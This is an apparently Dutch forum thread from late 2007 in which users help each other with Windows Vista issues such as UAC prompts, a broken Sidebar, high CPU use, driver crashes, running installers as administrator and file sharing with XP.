Gebruikersaccounts en dan gebruikersaccont beheer uitschakelen (niet aanbevolen)
Dat is dus alles in één keer uitzetten? Dat wil ik niet.quote:Op maandag 29 oktober 2007 22:11 schreef Treveo het volgende:
[..]
Gebruikersaccounts en dan gebruikersaccont beheer uitschakelen (niet aanbevolen)
quote:Op maandag 29 oktober 2007 22:17 schreef crossover het volgende:
[..]
Het is toch schijtirritant om dat telkens te moeten wegklikken? Achterlijke functie vind ik het.
Ja, maar het beschermt jou iig wel heel erg goedquote:Op maandag 29 oktober 2007 22:17 schreef crossover het volgende:
[..]
Het is toch schijtirritant om dat telkens te moeten wegklikken? Achterlijke functie vind ik het.
Ik weet niet hoe ij winrar gebruikt?quote:Op maandag 29 oktober 2007 22:25 schreef PietjePuk007 het volgende:
Ik heb UAC ook uitstaan, dan maar een beveiligingsrisico. Als je iets wil unrarren moet je wel 3x iets wegklikken, dat wordt op een gegeven moment echt irritant
.
ik dacht dat vista er ook eentje ingebouwd had.quote:Op woensdag 31 oktober 2007 11:30 schreef Devolution het volgende:
Niet dat ik weet, maar er zijn wel programma's voor, zoals Objectdock en RocketdockOf bedoel je de ingebouwde Vista Sidebar?
Heeft Vista niet ingebouwd als het goed isquote:Op woensdag 31 oktober 2007 12:17 schreef deliberator het volgende:
[..]
ik dacht dat vista er ook eentje ingebouwd had.
Net zoiets als Objectdock idd.
Draait sidebar.exe (bij de processen) wel?quote:Op woensdag 31 oktober 2007 20:36 schreef GrupoBalanca het volgende:
Sindskort doet mijn sidebar het niet meerhij start niet meer op.. ook is dat icoontje in mijn taakbalk verdwenen. sidebar.exe heb ik nog wel, maar als ik erop dubbelklikt dan doet ie niets. Heeft iemand een oplossing daarvoor? OS: Vista Home Premium
Nee ik zie sidebar.exe er niet tussen staanquote:Op donderdag 1 november 2007 02:46 schreef Boschkabouter het volgende:
[..]
Draait sidebar.exe (bij de processen) wel?
Staat het aan in je services?quote:Op donderdag 1 november 2007 10:37 schreef GrupoBalanca het volgende:
[..]
Nee ik zie sidebar.exe er niet tussen staan
Nee helaas staat het daar ook niet bijquote:
Dat heb ik tig keer al geprobeerd, maar helaasquote:Op donderdag 1 november 2007 22:44 schreef maartena het volgende:
Je kunt de Sidebar ook starten vanuit het Startmenu, werkt dat niet?
Sommige mensen hebben de smileys gedownload of gerestored met een tool... dan kan je ze om een of ander reden niet toevoegenquote:Op donderdag 1 november 2007 22:47 schreef deliberator het volgende:
Heb sinds net een vaag probleempje.
Kon gisteren in MSN Live Messenger nog van die smileys van andere kopieëren en toevoegen aan mijn eigen msn.
Nu heb ik de optie toevoegen niet meer
Is dat ergens in of uit te schakelen?
Wtf, wat gek? Het is gewoon alsof de service compleet van je PC is verdwenen...quote:Op donderdag 1 november 2007 11:11 schreef GrupoBalanca het volgende:
[..]
Nee helaas staat het daar ook niet bij
True, weet iemand hier misschien een oplossing voor?quote:Op donderdag 1 november 2007 23:00 schreef Treveo het volgende:
[..]
Wtf, wat gek? Het is gewoon alsof de service compleet van je PC is verdwenen...
hoe kan het dan dat ik onder xp van die personen ze wel kon toevoegen?quote:Op donderdag 1 november 2007 22:59 schreef Treveo het volgende:
[..]
Sommige mensen hebben de smileys gedownload of gerestored met een tool... dan kan je ze om een of ander reden niet toevoegen
MSNquote:Op maandag 5 november 2007 15:57 schreef deliberator het volgende:
Iemand een oplossing voor mijn probleem?
Optiesquote:Op woensdag 7 november 2007 13:55 schreef Boschkabouter het volgende:
Kun je Vista eigenlijk makkelijk upgraden van Home Premium > Business?
Virus? Trojan? Spyware? Doe eens anders even wat scans...quote:Op zondag 11 november 2007 14:06 schreef Sextreme het volgende:
Sinds een week of 3 is Vista zo traag als dikke stront... Dit komt doordat hij de CPU constant op 100% gebruikt om de een of andere reden. Zo duurt bijvoorbeeld deze computer openen al een seconde of 8-10 om de een of andere reden.
Iemand nog deze problemen gekregen de laatste tijd? En/of oplossingen hiervoor gevonden?
Lijkt me hoogst onwaarschijnlijk, ik weet wel hoe ik deze dingen buiten de deur moet houden. Maar 't is in ieder geval even de moeite van het proberen waard.quote:Op zondag 11 november 2007 14:32 schreef Treveo het volgende:
[..]
Virus? Trojan? Spyware? Doe eens anders even wat scans...
Anders kijken welke proces je CPU op 100% houdt en dan checken wat hij dan precies doetquote:Op zondag 11 november 2007 14:35 schreef Sextreme het volgende:
[..]
Lijkt me hoogst onwaarschijnlijk, ik weet wel hoe ik deze dingen buiten de deur moet houden. Maar 't is in ieder geval even de moeite van het proberen waard.
Dit had ik ook al eens bekeken in het taakbeheer, maar dat geeft niet aan welk proces nu 100 CPU gebruikt, terwijl dit wel het geval is volgens een andere meter, en dit is dan ook zeer duidelijk merkbaar aan de pc.quote:Op zondag 11 november 2007 14:57 schreef Treveo het volgende:
[..]
Anders kijken welke proces je CPU op 100% houdt en dan checken wat hij dan precies doet
Wtf? AVG ofzo zou echt moeten werken...quote:Op zondag 11 november 2007 17:15 schreef DarkManta het volgende:
Het vervelende van Vista is dat ik geen enkele antivirus aan het werk krijg.
Ik krijg dan iedere keer de melding dat de ...Dll en de ...kernel niet up to date zijn.
En wanneer ik een driver update wil doen, dan geeft ie aan dat ik de laatste nieuwe al heb.
AVG heb ik nog niet geprobeerd, wel Kaspersky, NOD32, symantic al geprobeerd...quote:Op zondag 11 november 2007 17:17 schreef Treveo het volgende:
[..]
Wtf? AVG ofzo zou echt moeten werken...
Goede actiequote:
Jep hier ook, en de rest nu ook, nadat ik AVG geinstalleerd had.quote:
Sexyquote:Op maandag 12 november 2007 05:35 schreef DarkManta het volgende:
[..]
Jep hier ook, en de rest nu ook, nadat ik AVG geinstalleerd had.
Eerste resultaat van Googlequote:The 'Delete' option when right-clicking the Recycle Bin is new, giving you the option of removing the shortcut from your desktop easily. To restore it you can go Start->Control Panel->Appearance and Personalization->Personalization and then click "change desktop icons" from the left-hand column. From there just check Recycle Bin and click OK.
Hope this helps,
John
LOL! Had ik dus ook gedaan, maar in verkenner kun je 'm gewoon nog zien.quote:Op maandag 12 november 2007 16:25 schreef WRNL het volgende:
Ik gebruik nu Vista sinds hij de eerste keer op de markt is verschenen, maar ik kom er even niet meer uit.
Per ongeluk heb ik mijn Recycle bin icoon verwijderd in plaats van de prullenbak leeg te maken. Maar ik weet niet meer hoe ik dat kan terughalen, iemand?
Met vLite, hé? Hier ongeveer 450 MB maar dan zit het ook vol met SuperFetch meukquote:Op maandag 12 november 2007 18:56 schreef DemonRage het volgende:
[..]
LOL! Had ik dus ook gedaan, maar in verkenner kun je 'm gewoon nog zien.
* DemonRage moet nog ff wennen aan Windows Fistfuck...
Ik heb bij m'n nieuwe laptop een heleboel eraf geflikkerd en niet laten laden... en dan nog na het opstarten zo'n 700 MB in gebruik.
Ja, download en installeer VLC.quote:Op maandag 12 november 2007 19:31 schreef Puckzzz het volgende:
Zo, ik mag me sinds vandaag ook melden in dit topic
fijn hoor nieuwe PC, maar het eerste probleem waar ik ff niet uitkom is het volgende... Als ik een AVI of ander filmbestand wil afspelen krijg ik geen beeld. Alleen maar geluid. Ik heb nog geen andere speler geinstalleerd, dus hij gebruikt de standaard media speler.
any ideas?
Goh, lees dan ook wat materie waarom Vista zoveel geheugen in neemt.quote:Op maandag 12 november 2007 18:56 schreef DemonRage het volgende:
[..]
* DemonRage moet nog ff wennen aan Windows Fistfuck...
Ik heb bij m'n nieuwe laptop een heleboel eraf geflikkerd en niet laten laden... en dan nog na het opstarten zo'n 700 MB in gebruik.
Gewoon in je options bij advanced?quote:Op maandag 12 november 2007 23:43 schreef Boschkabouter het volgende:
Weet iemand toevallig hoe die irritante waarschuwing bij de Terminal Service Client uitgeschakeld kan worden? Het zal me namelijk worst wezen of mijn server gecertificeerd is of niet.
Ah. Kut-Vista! Waarom moeten ze die optie zo verstoppen.quote:Op maandag 12 november 2007 23:47 schreef Godlike02 het volgende:
[..]
Gewoon in je options bij advanced?
is windows defender niet op de achtergrond aan het scannen ?quote:Op vrijdag 14 september 2007 14:57 schreef honderd het volgende:
Mijn hardeschijf is vaak nog bezig met van alles en nog wat terwijl ik niks aan het doen ben, eerst dacht ik dat het Windows Updates waren, maar dat is het niet. Iemand een idee?
Dus gewoon een snelkoppeling kopieren?quote:Op maandag 12 november 2007 18:56 schreef DemonRage het volgende:
[..]
quote:Op dinsdag 13 november 2007 02:49 schreef WRNL het volgende:
[..]
Dus gewoon een snelkoppeling kopieren?
Moeilijk he, lezen?quote:Op maandag 12 november 2007 18:12 schreef Devolution het volgende:
[The 'Delete' option when right-clicking the Recycle Bin is new, giving you the option of removing the shortcut from your desktop easily. To restore it you can go Start->Control Panel->Appearance and Personalization->Personalization and then click "change desktop icons" from the left-hand column. From there just check Recycle Bin and click OK.
Hope this helps,
John]
Eerste resultaat van Google
Ik had deze helemaal niet gelezen, dus vandaar...quote:Op dinsdag 13 november 2007 08:39 schreef RacerDKB het volgende:
[..]
[..]
Moeilijk he, lezen?
Weet iemand het antwoord op mijn harddiskvraag?
Waarschijnlijk super-fetch die steeds beter wordt in het voorspellen van je gedrag. Vista laad alles al van je HD in het geheugen voordat je het nodig hebt.quote:Op dinsdag 13 november 2007 08:47 schreef BertV het volgende:
Weer ff wat positiefs om mijn aandelen niet in gevaar te brengen.
Ik merk dat hoe langer je Vista hebt draaien, hoe soepeler alles verloopt.
Echt een opvallend verschil met XP waar het andersom is.
Dit alles op een oudere PC, met een recente schijf en 2GB geheugen.
Ja niet dus, hij jaagt nu sinds een week of 3 mijn CPU op een constante 100%... Ik zeg dit niet snel, maar ik wil echt XP weet terug.quote:Op dinsdag 13 november 2007 08:47 schreef BertV het volgende:
Weer ff wat positiefs om mijn aandelen niet in gevaar te brengen.
Ik merk dat hoe langer je Vista hebt draaien, hoe soepeler alles verloopt.
Echt een opvallend verschil met XP waar het andersom is.
Dit alles op een oudere PC, met een recente schijf en 2GB geheugen.
Dan kijk je wat het is wat het process pakt.quote:Op dinsdag 13 november 2007 18:41 schreef Sextreme het volgende:
[..]
Ja niet dus, hij jaagt nu sinds een week of 3 mijn CPU op een constante 100%... Ik zeg dit niet snel, maar ik wil echt XP weet terug.
Terwijl Vista zoveel leuks heeft te bieden![]()
Ik zou dan toch even gaan onderzoeken wel procesje het is dat 100% grijpt. Hou er rekening mee dat sommige oudere versies van software die nog gemaakt zijn voor XP niet altijd 100% vlekkeloos draaien onder Vista, en er dus een update moet worden geregeldquote:Op dinsdag 13 november 2007 18:41 schreef Sextreme het volgende:
Ja niet dus, hij jaagt nu sinds een week of 3 mijn CPU op een constante 100%... Ik zeg dit niet snel, maar ik wil echt XP weet terug.
Terwijl Vista zoveel leuks heeft te bieden![]()
Om even terug te komen op dit probleem... het uitzetten van aero lijkt te werken, maar kan het nog niet met 100% zekerheid zeggen. De videodriver houdt het nou iig langer uit bij spelletjes.quote:Op dinsdag 13 november 2007 20:53 schreef DemonRage het volgende:
Nog iemand meer met videokaart drivers die crashen in Vista als je spelletjes speelt?
Toen ik het invulde in google bleek de halve wereld er mee te zitten.
Ik heb een ATI Radeon HD 2600 en de driver atikmdag reageert volgens windows opeens niet meer.
Ook bij NVidia-gebruikers treden er trouwens crashes op in Windows Vista, daar crasht de driver nvlddmkm.
Als je fullscreen gamed gaat aero vanzelf uit, dus het lijkt me sterk dat het daaraan ligt.quote:Op woensdag 14 november 2007 18:24 schreef DemonRage het volgende:
[..]
Om even terug te komen op dit probleem... het uitzetten van aero lijkt te werken, maar kan het nog niet met 100% zekerheid zeggen. De videodriver houdt het nou iig langer uit bij spelletjes.
Ik heb tot nu toe alleen nog maar Unreal Tournament (2004 en de demo van UT3) geprobeerd. Bij 2004 traden de crashes op (doe goed hersteld werden overigens, na 1 sec. beelduitval)
Idd... het treedt dus nog steeds op.quote:Op woensdag 14 november 2007 19:22 schreef RacerDKB het volgende:
[..]
Als je fullscreen gamed gaat aero vanzelf uit, dus het lijkt me sterk dat het daaraan ligt.
quote:Op zondag 11 november 2007 14:06 schreef Sextreme het volgende:
Sinds een week of 3 is Vista zo traag als dikke stront... Dit komt doordat hij de CPU constant op 100% gebruikt om de een of andere reden. Zo duurt bijvoorbeeld deze computer openen al een seconde of 8-10 om de een of andere reden.
Iemand nog deze problemen gekregen de laatste tijd? En/of oplossingen hiervoor gevonden?
Ik heb scans gedaan, maar ik had geen virus, trojan of spyware.quote:Op zondag 11 november 2007 14:32 schreef Treveo het volgende:
[..]
Virus? Trojan? Spyware? Doe eens anders even wat scans...
Proc?quote:Op zaterdag 17 november 2007 13:13 schreef PietjePuk007 het volgende:
Wat voor proc heb je eigenlijk?
Anders ga je even zoeken op de ms site, lui geval....quote:Op zondag 18 november 2007 16:55 schreef RacerDKB het volgende:
Weet iemand nog leuke dingen voor in de Sidebar?
Heb nu alleen een klokje, het weer, prullenbak en harddisk ruimte.,
Zoals een goede, gratis RSS reader..
Webradio is idd redelijk ideaal.quote:Op zondag 18 november 2007 16:57 schreef PietjePuk007 het volgende:
Afbeeldingen
Radiostations
Fokke en Sukke
![]()
daar heb ik al gekeken, maar daar kon ik geeneen RSS reader kiezen die meerdere RSS feeds aankan...quote:Op zondag 18 november 2007 17:18 schreef Netsplitter het volgende:
[..]
Anders ga je even zoeken op de ms site, lui geval....![]()
Kan je die misschien online zetten?quote:Op zondag 18 november 2007 17:32 schreef Godlike02 het volgende:
[..]
Webradio is idd redelijk ideaal.
Ik heb zelf een Fok FP rss reader gemaakt destijds die gebruik ik ook vaak.
Nu zeker niet (geen tijd voor).quote:Op zondag 18 november 2007 18:46 schreef RacerDKB het volgende:
[..]
daar heb ik al gekeken, maar daar kon ik geeneen RSS reader kiezen die meerdere RSS feeds aankan...
[..]
Kan je die misschien online zetten?
Heb wel interesse in een FOK! newsheaderding.
Breek me de bek niet open. Ben al een week aan het kloten om dit te verhelpen. Hoe ergquote:Op dinsdag 13 november 2007 20:53 schreef DemonRage het volgende:
Nog iemand meer met videokaart drivers die crashen in Vista als je spelletjes speelt?
Toen ik het invulde in google bleek de halve wereld er mee te zitten.
Ik heb een ATI Radeon HD 2600 en de driver atikmdag reageert volgens windows opeens niet meer.
Ook bij NVidia-gebruikers treden er trouwens crashes op in Windows Vista, daar crasht de driver nvlddmkm.
Normaal gesproken gewoon rechtsklikken op de installer (setup.exe of zo) en "Run as Administrator" (of wat er ook staat in de NL versie) kiezen. Let op: je moet dan wel het wachtwoord van het administrator-account opgeven, indien je geen lid van de groep administrators bent (of er geen alternatieve settings ingesteld zijn).quote:Op woensdag 21 november 2007 20:34 schreef dubidub het volgende:
Ik wil een programma installeren. Als ik op die installer klik.. installeert 'ie hem, maar helemaal aan het einde geeft 'ie een foutmelding. Ik moet hem als administrator uitvoeren, dan zou 'ie het wel goed doen. Hoe doe ik dit? Ik ben namelijk de enige account op deze computer.
Vraag: Hoe voer je een programma als administrator uit?
Dat 'Run as administrator' staat er dus niet. Bij andere setups staat die er wel... ik snap het niet!quote:Op woensdag 21 november 2007 20:56 schreef Kptelmo het volgende:
[..]
Normaal gesproken gewoon rechtsklikken op de installer (setup.exe of zo) en "Run as Administrator" (of wat er ook staat in de NL versie) kiezen. Let op: je moet dan wel het wachtwoord van het administrator-account opgeven, indien je geen lid van de groep administrators bent (of er geen alternatieve settings ingesteld zijn).
Misschien is er een bypass ofzo?quote:Er is geen ondersteuning voor Spraakherkenning in de huidige taal
Ik heb volgens mij de oorzaak van het probleem gevonden... de problemen traden telkens op wanneer de GPU warm genoeg was om de fans te laten draaien. Dit heeft waarschijnlijk te maken met crappy energiebeheer.quote:Op woensdag 21 november 2007 12:00 schreef jackson het volgende:
[..]
Breek me de bek niet open. Ben al een week aan het kloten om dit te verhelpen. Hoe erg
Wat nog veel zuurder is dat dezelfde configuratie onder XP ook niet werkt. Zelfde problemen alleen dan zonder die melding. Aan vista ligt het dus niet maar wel aan de combinatie hardware/drivers van Nvidia. Waarom sommigen mensen dit probleem wel hebben en andere niet is onduidelijk. Heb er al dagen googlen opzitten maar kan geen nieuwe ideeën meer vinden.
Krijg zeer waarschijnlijk een ATI kaart (Radeon 3750) volgende week en ik hoop maar dat het opgelost is. Ik weet dat er mensen zijn die dezelfde problemen hebben met ATI-kaarten als jij ook hebt(de melding is uiteraard anders). Ben zo langzamerhand bang dat ook mijn ATI kaart dus niks zal verhelpen.
Het enige wat ik nog kan doen is mijn Bios flashen maar daar wacht ik mee totdat het met mijn nieuwe kaart nog niet werk.
Dank voor de tip maar het betreft geen laptop bij mij dus crappy energiebeheer is niet aan de orde. Ook doe ik nu even niks aan het probleem totdat mijn nieuwe ATI Radeon 3870 binnen is. Mocht ik dan nog problemen hebben ga ik wel weer proberen deze te tackelen. Ben er inmiddels wel doodziek van want met mijn huidige 6600GT is het jankenquote:Op donderdag 22 november 2007 20:18 schreef DemonRage het volgende:
[..]
Ik heb volgens mij de oorzaak van het probleem gevonden... de problemen traden telkens op wanneer de GPU warm genoeg was om de fans te laten draaien. Dit heeft waarschijnlijk te maken met crappy energiebeheer.
Ik heb een ATI Mobility Radeon HD2600 en heb Catalyst Control Center op m'n laptop (komt bij de video driver). Hier zit een optie powerplay in die, wanneer het aan staat (da's standaard), de GPU core/mem clocks regelt als onderdeel van energiebeheer. Wanneer ik powerplay uitschakel, dan heb ik geen problemen meer en ook geen performanceverlies. In 3DMark2006 heb ik 3215 marks met powerplay aan en 3216 marks met powerplay uit.
Misschien heeft NVidia een soortgelijke optie om energiebeheer voor de GPU in of uit te schakelen? Dan zou je eens kunnen proberen om dat uit te schakelen en kijken of de problemen alsnog optreden.
Koop een normale computer, en configureer 'm juist. Hoe naïef om te denken dat het aan Vista ligtquote:Op vrijdag 23 november 2007 10:11 schreef Puckzzz het volgende:
pfffffffff...hij doet er nu al bijna 10 minuten over om een DVDtje met foto's te openen...talk about fast
tsjeezus wat knap van je om van die afstand te kunnen zien wat voor computer ik heb!!quote:Op vrijdag 23 november 2007 10:12 schreef PietjePuk007 het volgende:
[..]
Koop een normale computer, en configureer 'm juist. Hoe naïef om te denken dat het aan Vista ligt. De consumentenbond kan veel mensen wat wijs maken.
Minder knap dan jou conclusie dat 't aan Vista ligtquote:Op vrijdag 23 november 2007 10:17 schreef Puckzzz het volgende:
tsjeezus wat knap van je om van die afstand te kunnen zien wat voor computer ik heb!!![]()
nou Oh grote PC Goeroe...vertel mij dan eens waar het wél aan ligt i.p.v. deze nuttige reactiesquote:Op vrijdag 23 november 2007 10:18 schreef PietjePuk007 het volgende:
[..]
Minder knap dan jou conclusie dat 't aan Vista ligt.
ik ben heus wel liefquote:Op vrijdag 23 november 2007 12:43 schreef EvilMarc het volgende:
En hoe dan wel...? Misschien ben je wel aan het liegen ?
en je fobo is echt eng
Hier staat ie gewoon in mijn Start -> All programs -,-quote:Op vrijdag 23 november 2007 18:46 schreef YuckFou het volgende:
Ik zoek de map 'opstarten' of 'startup' in Vista, kennelijk zijn bij wat oudere programma's de vinkjes 'start with windows' niet vista proof ofzo, vroeger gooide je dat in startup en klaar, nu kan ik die niet vinden?
Blind, deaf aswel as stupid....quote:Op vrijdag 23 november 2007 18:52 schreef Treveo het volgende:
[..]
Hier staat ie gewoon in mijn Start -> All programs -,-
Hehe, npquote:Op vrijdag 23 november 2007 22:05 schreef YuckFou het volgende:
[..]
Blind, deaf aswel as stupid....![]()
thank you!
quote:
Jup...quote:Op woensdag 2 januari 2008 19:15 schreef RacerDKB het volgende:
Ik heb een netwerk tussen een laptop met XP en een desktop met Vista Ultimate.
Van de Vista pc kan ik gewoon alles zien wat er gedeeld is op de laptop, en dingen kopieren. Op de vista pc staan ook een paar mappen gewoon goed gedeeld. Als ik echter op die XP laptop probeer te browsen door de Vista pc zegt ie dat ie een wachtwoord nodig heeft
En ik heb geen wachtwoord voor de pc, en geen useraccounts.
Iemand?
Netwerkcentrum checken... "Met wachtwoord beveiligd delen" staat waarschijnlijk aanquote:Op woensdag 2 januari 2008 19:15 schreef RacerDKB het volgende:
Ik heb een netwerk tussen een laptop met XP en een desktop met Vista Ultimate.
Van de Vista pc kan ik gewoon alles zien wat er gedeeld is op de laptop, en dingen kopieren. Op de vista pc staan ook een paar mappen gewoon goed gedeeld. Als ik echter op die XP laptop probeer te browsen door de Vista pc zegt ie dat ie een wachtwoord nodig heeft
En ik heb geen wachtwoord voor de pc, en geen useraccounts.
Iemand?
quote:Op zondag 18 november 2007 16:55 schreef RacerDKB het volgende:
Weet iemand nog leuke dingen voor in de Sidebar?
Heb nu alleen een klokje, het weer, prullenbak en harddisk ruimte.,
Zoals een goede, gratis RSS reader..
http://gallery.live.com/results.aspx?bt=1&pl=1quote:Op maandag 19 november 2007 16:22 schreef RoodWitBlauw het volgende:
Iemand enig idee of er een Windows Mediaplayer gadget is voor de Vista sidebar?of een andere media player die je in de sidebar kan laten spelen?
Is het ook mogelijk om die sidebar horizontaal bovenin mijn scherm weeer te geven??
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |